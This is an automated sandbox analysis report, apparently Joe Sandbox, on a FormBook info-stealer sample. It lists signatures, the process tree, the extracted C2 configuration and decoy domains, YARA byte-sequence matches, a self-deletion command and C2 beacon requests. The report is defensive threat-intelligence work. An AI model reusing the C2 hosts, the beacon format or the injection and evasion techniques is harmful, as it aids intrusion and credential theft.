Windows Analysis Report Y1p8VPvyU2

Overview

General Information

Sample Name: Y1p8VPvyU2 (renamed file extension from none to exe)
Analysis ID: 532909
MD5: 83be105c9fa2427bd6079f5d19659596
SHA1: 1430baa740d2cd40a507cbfa8fe62e3d78424315
SHA256: 8cd6125941710166af38133bce6cae9f9cc41c8d88ff774cd691081d193015a1
Tags: 32, exe, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • Y1p8VPvyU2.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" MD5: 83BE105C9FA2427BD6079F5D19659596)
    • Y1p8VPvyU2.exe (PID: 1304 cmdline: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" MD5: 83BE105C9FA2427BD6079F5D19659596)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 4816 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 3192 cmdline: /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.tgalegail.quest/n6fr/"], "decoy": ["magnetic-island-qld.com", "yr-golf.com", "udyam-registration.com", "paulsamaco.com", "mimisminiatureboutique.store", "csspadding.com", "gujaratigyaan.com", "findphotographersonline.com", "clevelawareness.com", "purelyhawaii.com", "2axx.com", "tricktodance.com", "getstoic.com", "globexglobalstore.com", "mysticnail.net", "handejqr.com", "letswatch.online", "lnfddttoyof6.xyz", "tdc-trust.com", "federalimmigrationgola.com", "cinasing.com", "614721.com", "pumpizy.com", "satsumauosen-official.com", "fairytalesinc.com", "fastbest.host", "assisttm.com", "triniautotrader.com", "alissanoume.xyz", "ma-manger.com", "twinpick.paris", "easycv4u.com", "xn--2i0bm4p1b62jv8dxz3b7uj.com", "ventleetailoronline.com", "8355512.win", "catlyfoundation.com", "mygeorgecolemanfordstory.com", "haiphongmap.com", "canvasb.net", "salvationhubtv.com", "teamisenberg.com", "innoclubs.com", "glwcn.net", "byshelly.biz", "commongroundcowork.com", "zhonglucredit.com", "tyjgfuke.com", "caixadepandora.club", "webuywholesalerhouses.com", "hundvardag.com", "nchh02.xyz", "oqnr.top", "rapidfreecredit.com", "alquilarorihuela.com", "medicijnenshop.com", "somoslaostra.com", "luvvlyjubblyshop.com", "housestephenson.com", "39abxx.com", "gsjbd1.club", "luisantonioenedina.com", "xn--pckwb0cye6947ajzku8opzi.com", "jakihmentha.quest", "clothingteesshop.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      0.2.Y1p8VPvyU2.exe.2420000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        0.2.Y1p8VPvyU2.exe.2420000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.Y1p8VPvyU2.exe.2420000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        1.0.Y1p8VPvyU2.exe.400000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          1.0.Y1p8VPvyU2.exe.400000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: Y1p8VPvyU2.exe, Virustotal: Detection: 35%
          Source: Y1p8VPvyU2.exe, ReversingLabs: Detection: 64%
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll, ReversingLabs: Detection: 50%
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Y1p8VPvyU2.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 6.2.cscript.exe.592796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Y1p8VPvyU2.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Y1p8VPvyU2.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.Y1p8VPvyU2.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 6.2.cscript.exe.35c8670.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Y1p8VPvyU2.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cscript.pdbUGP source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Y1p8VPvyU2.exe, 00000000.00000003.303889590.0000000002C00000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000000.00000003.304490729.0000000002A70000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y1p8VPvyU2.exe, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: cscript.pdb source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405250
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,0_2_00405C22
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 4x nop then pop edi1_2_0041567D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 4x nop then pop edi1_1_0041567D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi6_2_0123567D

          Networking:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Domain query: www.assisttm.com
          Source: C:\Windows\explorer.exe, Domain query: www.gsjbd1.club
          Source: C:\Windows\explorer.exe, Network Connect: 23.110.214.34 80
          Source: C:\Windows\explorer.exe, Network Connect: 45.8.125.8 80
          Source: C:\Windows\explorer.exe, Domain query: www.tyjgfuke.com
          Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe, Domain query: www.yr-golf.com
          Source: C:\Windows\explorer.exe, Domain query: www.fastbest.host
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.tgalegail.quest/n6fr/
          Source: Joe Sandbox View, ASN Name: LEASEWEB-USA-LAX-11US LEASEWEB-USA-LAX-11US
          Source: Joe Sandbox View, ASN Name: SELECTELRU SELECTELRU
          Source: global trafficHTTP traffic detected: GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB HTTP/1.1Host: www.yr-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh HTTP/1.1Host: www.assisttm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom HTTP/1.1Host: www.fastbest.hostConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 19:00:36 GMTContent-Type: text/htmlContent-Length: 275ETag: "61973ffe-113"Via: 1.1 googleConnection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 19:00:41 GMTContent-Type: text/htmlContent-Length: 275ETag: "61a4f026-113"Via: 1.1 googleConnection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 02 Dec 2021 19:01:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 7081Connection: closeLast-Modified: Mon, 27 Sep 2021 00:52:07 GMTETag: "1ba9-5ccef81a2c93b"
          Source: Y1p8VPvyU2.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Y1p8VPvyU2.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: cscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmp, String found in binary or memory: http://www.tyjgfuke.com/$t
          Source: cscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmp, String found in binary or memory: http://www.tyjgfuke.com/n6fr/?r8Yhe8X=LSrsi9BeeNNPJfOX4A9nLsTLbEdx4M4dJGVYJBt
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp, String found in binary or memory: https://browsehappy.com/
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp, String found in binary or memory: https://fastbest.host
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp, String found in binary or memory: https://fonts.googleapis.com/css2?family=Josefin
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp, String found in binary or memory: https://fonts.googleapis.com/css2?family=Open
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp, String found in binary or memory: https://fonts.gstatic.com
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp, String found in binary or memory: https://via.placeholder.com/100
          Source: unknown, DNS traffic detected: queries for: www.yr-golf.com
          Source: Y1p8VPvyU2.exe, 00000000.00000002.305416904.00000000006FA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404E07

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: Y1p8VPvyU2.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
